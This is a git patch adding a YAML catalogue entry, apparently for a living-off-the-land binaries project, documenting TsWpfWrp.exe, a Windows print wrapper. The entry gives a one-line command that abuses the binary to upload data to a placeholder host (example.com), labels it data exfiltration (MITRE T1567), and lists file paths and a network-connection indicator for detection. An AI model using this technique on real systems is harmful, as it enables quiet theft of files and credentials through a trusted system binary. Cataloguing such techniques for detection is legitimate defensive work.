From 20ea9d337915cefe8f7191695f4214794e1578d8 Mon Sep 17 00:00:00 2001
From: Avihay Eldad <46644022+avihayeldad@users.noreply.github.com>
Date: Thu, 25 Apr 2024 14:05:30 +0300
Subject: [PATCH] Add files via upload

---
 yml/OSBinaries/TsWpfWrp.yml | 24 ++++++++++++++++++++++++
 1 file changed, 24 insertions(+)
 create mode 100644 yml/OSBinaries/TsWpfWrp.yml

diff --git a/yml/OSBinaries/TsWpfWrp.yml b/yml/OSBinaries/TsWpfWrp.yml
new file mode 100644
index 0000000..a6786b5
--- /dev/null
+++ b/yml/OSBinaries/TsWpfWrp.yml
@@ -0,0 +1,24 @@
+---
+Name: TsWpfWrp.exe
+Description: Windows Presentation Foundation Terminal Server Print Wrapper
+Author: Avihay Eldad
+Created: 2024-04-25
+Commands:
+  - Command: TsWpfWrp.exe http://example.com/ExfilData blabla
+    Description: Upload file, credentials or data exfiltration in general
+    Usecase: Exfilitrate data to remote server
+    Category: Upload
+    Privileges: User
+    MitreID: T1567
+    OperatingSystem: Windows
+Full_Path:
+  - Path: C:\Windows\System32\TsWpfWrp.exe
+  - Path: C:\Windows\SysWOW64\TsWpfWrp.exe
+Detection:
+  - IOC: TsWpfWrp making unexpected network connections or DNS requests
+Acknowledgement:
+  - Person: Avihay Eldad
+    Handle: '@AvihayEldad'
+  - Person: Sagi Dinar
+    Handle: '@DinarSagi'
+    
\ No newline at end of file